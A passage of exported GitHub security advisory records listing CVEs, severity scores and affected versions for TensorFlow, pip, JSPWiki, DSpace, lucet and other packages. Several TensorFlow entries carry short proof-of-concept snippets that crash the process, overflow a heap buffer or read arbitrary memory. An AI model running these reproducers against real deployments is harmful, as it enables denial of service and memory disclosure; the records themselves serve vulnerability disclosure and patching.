'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-5crj-c72x-m7gq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41217'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/05cbebd3c6bb8f517a158b0155debb8df79017ff'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:12:27Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}" +1.4.0,GHSA-5xp3-jfq3-5q8x,2021-11-17T21:23:42Z,2021-11-15T17:45:01Z,,['CVE-2021-3572'],Improper Input Validation in pip,A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. This is fixed in python-pip version 21.1.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pip'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3572'}, {'type': 'WEB', 'url': 'https://github.com/pypa/pip/pull/9827'}, {'type': 'WEB', 'url': 'https://github.com/pypa/pip/commit/e46bdda9711392fec0c45c1175bae6db847cb30b'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2021:3254'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1962856'}, {'type': 'PACKAGE', 'url': 'https://github.com/pypa/pip'}, {'type': 'WEB', 'url': 'https://packetstormsecurity.com/files/162712/USN-4961-1.txt'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-12T19:41:47Z', 'nvd_published_at': '2021-11-10T18:15:00Z'}" +1.4.0,GHSA-8gw6-w5rw-4g5c,2021-11-30T14:44:44Z,2021-11-29T17:59:24Z,,['CVE-2021-44140'],Incorrect Default Permissions in Apache JSPWiki,"Remote attackers may delete arbitrary files in a system hosting a JSPWiki instance, versions up to 2.11.0.M8, by using a carefuly crafted http request on logout, given that those files are reachable to the user running the JSPWiki instance. Apache JSPWiki users should upgrade to 2.11.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.jspwiki:jspwiki-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44140'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/jspwiki'}, {'type': 'WEB', 'url': 'https://jspwiki-wiki.apache.org/Wiki.jsp?page=CVE-2021-44140'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/5qglpjdhvobppx7j550lf1sk28f6011t'}]","{'cwe_ids': ['CWE-276'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-25T00:25:46Z', 'nvd_published_at': '2021-11-24T12:15:00Z'}" +1.4.0,GHSA-hgc3-hp6x-wpgx,2021-11-17T21:17:29Z,2021-11-03T17:36:22Z,,['CVE-2021-3840'],Antilles Dependency Confusion Vulnerability,"### Potential Impact: +Remote code execution. + +### Scope of Impact: +Open-source project specific. + +### Summary Description: +A dependency confusion vulnerability was reported in the Antilles open-source software prior to version 1.0.1 that could allow for remote code execution during installation due to a package listed in requirements.txt not existing in the public package index (PyPi). +MITRE classifies this weakness as an Uncontrolled Search Path Element (CWE-427) in which a private package dependency may be replaced by an unauthorized package of the same name published to a well-known public repository such as PyPi. +The configuration has been updated to only install components built by Antilles, removing all other public package indexes. Additionally, the antilles-tools dependency has been published to PyPi. + +### Mitigation Strategy for Customers (what you should do to protect yourself): +Remove previous versions of Antilles as a precautionary measure and Update to version 1.0.1 or later. + +### Acknowledgement: +The Antilles team thanks Kotko Vladyslav for reporting this issue. + +### References: +https://github.com/lenovo/Antilles/commit/c7b9c5740908b343aceefe69733d9972e64df0b9 +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'antilles-tools'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/lenovo/Antilles/security/advisories/GHSA-hgc3-hp6x-wpgx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3840'}, {'type': 'WEB', 'url': 'https://github.com/lenovo/Antilles/commit/c7b9c5740908b343aceefe69733d9972e64df0b9'}, {'type': 'PACKAGE', 'url': 'https://github.com/lenovo/Antilles'}]","{'cwe_ids': ['CWE-427'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T15:04:04Z', 'nvd_published_at': '2021-11-12T22:15:00Z'}" +1.4.0,GHSA-c65v-p733-9796,2021-11-22T18:39:54Z,2021-11-23T18:17:33Z,,['CVE-2021-3961'],Cross-site Scripting in snipe/snipe-it,snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3961'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/7ce5993f5ae9d713a0955c2fd8e2dff7a7ce886e'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/5987aed5-6613-4937-8a3e-d48009b7da10'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:39:54Z', 'nvd_published_at': '2021-11-19T12:15:00Z'}" +1.4.0,GHSA-2p25-55c9-h58q,2021-11-08T22:53:02Z,2021-11-10T19:33:58Z,,['CVE-2021-41198'],Overflow/crash in `tf.tile` when tiling tensor is large,"### Impact +If `tf.tile` is called with a large input argument then the TensorFlow process will crash due to a `CHECK`-failure caused by an overflow. + +```python +import tensorflow as tf +import numpy as np +tf.keras.backend.tile(x=np.ones((1,1,1)), n=[100000000,100000000, 100000000]) +``` + +The number of elements in the output tensor is too much for the `int64_t` type and the overflow is detected via a `CHECK` statement. This aborts the process. + +### Patches +We have patched the issue in GitHub commit [9294094df6fea79271778eb7e7ae1bad8b5ef98f](https://github.com/tensorflow/tensorflow/commit/9294094df6fea79271778eb7e7ae1bad8b5ef98f) (merging [#51138](https://github.com/tensorflow/tensorflow/pull/51138)). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported externally via a [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46911).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-2p25-55c9-h58q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41198'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/46911'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/9294094df6fea79271778eb7e7ae1bad8b5ef98f'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:53:02Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}" +1.4.0,GHSA-pjjf-hc4q-g298,2021-11-17T21:11:29Z,2021-11-15T23:16:17Z,,['CVE-2021-3775'],showdoc is vulnerable to Cross-Site Request Forgery (CSRF),showdoc is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'showdoc/showdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.9.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3775'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/commit/67093c879a6563aa6ee08003177777d1975e2351'}, {'type': 'PACKAGE', 'url': 'https://github.com/star7th/showdoc'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/6a59d203-4ca7-4aed-bdb9-1e39b66c77b3'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T20:26:18Z', 'nvd_published_at': '2021-11-13T10:15:00Z'}" +1.4.0,GHSA-3ff2-r28g-w7h9,2021-11-08T22:21:10Z,2021-11-10T18:57:19Z,,['CVE-2021-41216'],Heap buffer overflow in `Transpose`,"### Impact +The [shape inference function for `Transpose`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/array_ops.cc#L121-L185) is vulnerable to a heap buffer overflow: + +```python +import tensorflow as tf +@tf.function +def test(): + y = tf.raw_ops.Transpose(x=[1,2,3,4],perm=[-10]) + return y + +test() +``` + +This occurs whenever `perm` contains negative elements. The shape inference function does not validate that the indices in `perm` are all valid: + +```cc +for (int32_t i = 0; i < rank; ++i) { + int64_t in_idx = data[i]; + if (in_idx >= rank) { + return errors::InvalidArgument(""perm dim "", in_idx, + "" is out of range of input rank "", rank); + } + dims[i] = c->Dim(input, in_idx); +} +``` + +where `Dim(tensor, index)` accepts either a positive index less than the rank of the tensor or the special value `-1` for unknown dimensions. + +### Patches +We have patched the issue in GitHub commit [c79ba87153ee343401dbe9d1954d7f79e521eb14](https://github.com/tensorflow/tensorflow/commit/c79ba87153ee343401dbe9d1954d7f79e521eb14). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-3ff2-r28g-w7h9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41216'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/c79ba87153ee343401dbe9d1954d7f79e521eb14'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/array_ops.cc#L121-L185'}]","{'cwe_ids': ['CWE-120', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:21:10Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}" +1.4.0,GHSA-ff84-84q5-fq4f,2021-11-22T19:05:02Z,2021-11-23T17:56:54Z,,['CVE-2021-39232'],Incorrect Authorization in Apache Ozone,"In Apache Ozone versions prior to 1.2.0, certain admin related SCM commands can be executed by any authenticated users, not just by admins.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ozone:ozone-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39232'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C3c30a7f2-13a4-345e-6c8a-c23a2b937041%40apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/3'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:05:02Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}" +1.4.0,GHSA-m4hj-wg2r-qpcr,2021-11-17T21:10:57Z,2021-11-15T23:13:34Z,,['CVE-2021-3776'],showdoc is vulnerable to Cross-Site Request Forgery (CSRF),showdoc is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'showdoc/showdoc'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.13'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.12'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3776'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/commit/67093c879a6563aa6ee08003177777d1975e2351'}, {'type': 'PACKAGE', 'url': 'https://github.com/star7th/showdoc'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/e0edf27d-437e-44fe-907a-df020f385304'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T19:41:42Z', 'nvd_published_at': '2021-11-13T10:15:00Z'}" +1.4.0,GHSA-gh8h-7j2j-qv4f,2021-11-08T22:50:32Z,2021-11-10T19:31:16Z,,['CVE-2021-41200'],Incomplete validation in `tf.summary.create_file_writer`,"### Impact +If `tf.summary.create_file_writer` is called with non-scalar arguments code crashes due to a `CHECK`-fail. + +```python +import tensorflow as tf +import numpy as np +tf.summary.create_file_writer(logdir='', flush_millis=np.ones((1,2))) +``` + +### Patches +We have patched the issue in GitHub commit [874bda09e6702cd50bac90b453b50bcc65b2769e](https://github.com/tensorflow/tensorflow/commit/874bda09e6702cd50bac90b453b50bcc65b2769e) (merging [#51715](https://github.com/tensorflow/tensorflow/pull/51715)). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported externally via a [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46909).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gh8h-7j2j-qv4f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41200'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/46909'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/874bda09e6702cd50bac90b453b50bcc65b2769e'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-617'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:50:32Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}" +1.4.0,GHSA-cf2j-vf36-c6w8,2021-10-29T17:26:35Z,2021-11-01T19:18:16Z,,['CVE-2021-41189'],Communities and collections administrators can escalate their privilege up to system administrator,"### Impact +Any community or collection administrator can escalate their permission up to become system administrator. + +This vulnerability only existed in 7.0 and does not impact 6.x or below. + +### Patches +Fix is included in [7.1](https://github.com/DSpace/DSpace/releases/tag/dspace-7.1). Please upgrade to 7.1 at your earliest convenience. + +### Workarounds +In 7.0, temporarily disable the ability for community or collection administrators to manage permissions or workflows settings, i.e. set the following properties in your local.cfg / dspace.cfg file +``` +core.authorization.collection-admin.policies = false +core.authorization.community-admin.policies = false +core.authorization.community-admin.collection.workflows = false +``` +Once upgraded to 7.1, these settings can be safely reverted to the default values of `true`. + +### References +Discovered during investigation of https://github.com/DSpace/DSpace/issues/7928 + +### For more information +If you have any questions or comments about this advisory: +* Email us at security@dspace.org +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.dspace:dspace-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0'}, {'fixed': '7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/DSpace/DSpace/security/advisories/GHSA-cf2j-vf36-c6w8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41189'}, {'type': 'WEB', 'url': 'https://github.com/DSpace/DSpace/issues/7928'}, {'type': 'WEB', 'url': 'https://github.com/DSpace/DSpace/commit/277b499a5cd3a4f5eb2370513a1b7e4ec2a6e041'}, {'type': 'WEB', 'url': 'https://github.com/DSpace/DSpace/commit/c3bea16ab911606e15ae96c97a1575e1ffb14f8a'}, {'type': 'PACKAGE', 'url': 'https://github.com/DSpace/DSpace'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-29T17:26:35Z', 'nvd_published_at': '2021-10-29T18:15:00Z'}" +1.4.0,GHSA-hf79-8hjp-rrvq,2021-11-30T22:05:58Z,2021-11-30T22:20:36Z,,['CVE-2021-43790'],Use After Free in lucet,"### Impact +There is a bug in the main branch of Lucet's `lucet-runtime` that allows a use-after-free in an `Instance` object that could result in memory corruption, data race, or other related issues. This bug was introduced early in the development of Lucet and is present in all releases. As a result of this bug, and dependent on the memory backing for the `Instance` objects, it is possible to trigger a use-after-free when the `Instance` is dropped. + +### Patches +Users should upgrade to the `main` branch of the Lucet repository. Lucet does not provide versioned releases on crates.io. + +### Workarounds +There is no way to remediate this vulnerability without upgrading. + +### Description +Lucet uses a ""pool"" allocator for new WebAssembly instances that are created. This pool allocator manages everything from the linear memory of the wasm instance, the runtime stack for async switching, as well as the memory behind the Instance itself. `Instances` are referred to via an `InstanceHandle` type which will, on drop, release the memory backing the Instance back to the pool. + +When an Instance is dropped, the fields of the `Instance` are destructed top-to-bottom, however when the `alloc: Alloc` field is destructed, the memory backing the `Instance` is released back to the pool before the destructors of the remaining fields are run. If another thread allocates the same memory from the pool while these destructors are still running, a race condition occurs that can lead to use-after-free errors. + +The bug was corrected by changing how the `InstanceHandle` destructor operates to ensure that the memory backing an Instance is only returned to the pool once the `Instance` has been completely destroyed. + +This security advisory has been assigned CVE-2021-43790. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [lucet repository](https://github.com/bytecodealliance/lucet) +* Email [the lucet team](mailto:lucet@fastly.com) +* See the [Bytecode Alliance security policy](https://bytecodealliance.org/security) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'lucet-runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/bytecodealliance/lucet/security/advisories/GHSA-hf79-8hjp-rrvq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43790'}, {'type': 'WEB', 'url': 'https://github.com/bytecodealliance/lucet/commit/7c7757c772fb709c61b1442bcc1e1fbee97bf4a8'}, {'type': 'WEB', 'url': 'https://crates.io/crates/lucet-runtime'}, {'type': 'PACKAGE', 'url': 'https://github.com/bytecodealliance/lucet'}]","{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-30T20:56:59Z', 'nvd_published_at': '2021-11-30T00:15:00Z'}" +1.4.0,GHSA-j8c8-67vp-6mx7,2021-11-08T21:47:47Z,2021-11-10T18:34:49Z,,['CVE-2021-41227'],Arbitrary memory read in `ImmutableConst`,"### Impact +The `ImmutableConst` operation in TensorFlow can be tricked into reading arbitrary memory contents: + +```python +import tensorflow as tf + +with open('/tmp/test','wb') as f: + f.write(b'\xe2'*128) + data = tf.raw_ops.ImmutableConst(dtype=tf.string,shape=3,memory_region_name='/tmp/test') + +print(data) +``` + +This is because the `tstring` TensorFlow string class has a special case for memory mapped strings but the operation itself does not offer any support for this datatype. + +### Patches +We have patched the issue in GitHub commit [3712a2d3455e6ccb924daa5724a3652a86f6b585](https://github.com/tensorflow/tensorflow/commit/3712a2d3455e6ccb924daa5724a3652a86f6b585) and GitHub commit [1cb6bb6c2a6019417c9adaf9e6843ba75ee2580b](https://github.com/tensorflow/tensorflow/commit/1cb6bb6c2a6019417c9adaf9e6843ba75ee2580b). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 